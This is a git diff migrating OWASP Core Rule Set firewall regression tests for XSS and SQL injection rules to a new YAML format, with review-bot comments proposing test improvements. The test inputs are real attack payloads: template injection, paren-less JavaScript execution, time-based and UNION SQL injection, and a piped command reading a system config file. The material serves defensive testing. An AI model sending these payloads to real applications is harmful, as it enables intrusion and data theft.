b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index de766fa..5b4a9f5 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml 
@@ -1,24 +1,22 @@
 ---
 meta:
 author: "Franziska Buehler, azurit"
- description: None
- enabled: true
- name: 941380.yaml
+rule_id: 941380
 tests:
- - test_title: 941380-1
+ - test_id: 1
 desc: "AngularJS client side template injection detection"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff"
- # /login?user={{constructor.constructor('alert(1)')()}}
- version: HTTP/1.1
- output:
- log_contains: id "941380"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff"
+ # /login?user={{constructor.constructor('alert(1)')()}}
+ version: HTTP/1.1
+ output:
+ log:
+ expect_ids: [941380]
diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
index b412b74..0de1e92 100644
--- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
+++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
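Review bot: The decoded-payload comment carried over to the new side, `# /login?user={{constructor.constructor('alert(1)')()}}`, no longer describes the request it annotates: the `uri` line sends `/get/login?user=%20x%20%7B%7B...%7D%7D%20.%20ff`, i.e. the template expression is padded with ` x ` before and ` . ff` after, which is presumably the point of the case (the rule must find `{{ }}` embedded in surrounding text). Change it to `# decodes to: /get/login?user= x {{constructor.constructor('alert(1)')()}} . ff`. The file also contains only this one positive case; a second test with `no_expect_ids: [941380]` and a harmless `{{name}}`-style placeholder would guard against the rule overmatching plain mustache templates, though whether such input matches depends on the rule regex, which is not part of this hunk.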
@@ -1,151 +1,149 @@ --- meta: author: "Franziska Buehler, Xhoenix, azurit" - description: None - enabled: true - name: 941390.yaml +rule_id: 941390 tests: - - test_title: 941390-1 + - test_id: 1 desc: "JavaScript method setInterval(code, 1)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=setInterval%28code%2C%201%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=setInterval%28code%2C%201%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 2 desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 3 desc: "JavaScript method eval('2 + 2')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=eval%28%272%20%2B%202%27%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=eval%28%272%20%2B%202%27%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 4 desc: "JavaScript constructor new Function()" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=new%20Function%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=new%20Function%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 5 desc: "JavaScript call alert" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=alert%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=alert%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 6 desc: "JavaScript call atob" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=atob%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=atob%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 7 desc: "JavaScript call btoa" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=btoa%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=btoa%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 8 desc: "JavaScript call prompt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=prompt%28%29" - version: HTTP/1.1 - output: - log_contains: 
id "941390" - - test_title: 941390-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=prompt%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] + - test_id: 9 desc: "JavaScript call confirm" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=confirm%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=confirm%28%29" + version: HTTP/1.1 + output: + log: + expect_ids: [941390] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml index ddecdfe..12cc969 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml 
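Review bot: Tests 8 and 9 (`prompt()` and `confirm()`) send an Accept header ending in `image/png,*/*;q=0.>`, while every other test in the file ends in `*/*;q=0.5`; the value is on both the removed and the added lines, so the commit preserved rather than introduced it, but since every line of these tests was rewritten this is the place to correct it. If that is what the file holds and not a rendering artefact, change it to `Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"`. A malformed q-value is not what rule 941390 is meant to be exercised on, and it makes the fixture differ from its siblings for no reason. The file still has only positive cases; a request with `no_expect_ids: [941390]` and a benign word such as `arg=evaluation` would pin the rule against false positives, assuming its regex keys on the call syntax rather than the bare name.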
@@ -1,119 +1,117 @@ --- meta: author: "Andrea Menin, azurit" - description: None - enabled: true - name: 941400.yaml +rule_id: 941400 tests: - - test_title: 941400-1 + - test_id: 1 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 2 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 3 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 4 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 5 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 6 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 7 desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?test=Reflect.sort.call%60%60" - version: HTTP/1.1 - output: - log_contains: id "941400" + - 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?test=Reflect.sort.call%60%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 69fb901..e7c6163 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml 
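Review bot: Tests 1 through 6 all carry the identical `desc: "JavaScript function without parentheses"`, so a failing test id says nothing about which evasion variant regressed, even though the `uri` lines differ deliberately: compact form, whitespace between tokens, a `/**/` comment before `sort`, `map.call` with `\u{61}lert` and `\x28`/`\x29` escapes, the same with a `/* asd */` comment, and `Reflect.apply.call` with `navigation.navigate`. Give each its distinguishing feature, e.g. `desc: "JavaScript function without parentheses: whitespace between tokens"` for test 2 and `desc: "JavaScript function without parentheses: /**/ comment before method name"` for test 3. The `desc` lines are context the commit did not touch, but the format migration is the natural moment to do it.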
@@ -2,244 +2,243 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942100.yaml +rule_id: 942100 tests: - - test_title: 942100-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1234 OR 1=1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1234 OR 1=1" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-1839' or '1'='1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839' or '1'='1" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST 
- port: 80 - uri: "/post" - data: "var=-1839\" or \"1\"=\"2" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839\" or \"1\"=\"2" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 4 desc: "Basic SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 5 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue' and 526=527" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue' and 
526=527" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 7 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 8 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 9 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 10 desc: "Advanced SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "1'||(select extractvalue(xmltype('%toyop;" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "1'||(select extractvalue(xmltype('%toyop;" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 11 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=sleep(20)" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 12 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 13 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" 
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\" | type %SystemDrive%\\\\config.ini | \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\" | type %SystemDrive%\\\\config.ini | \"" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 14 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" - version: HTTP/1.0 - output: - log_contains: id "942100" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml 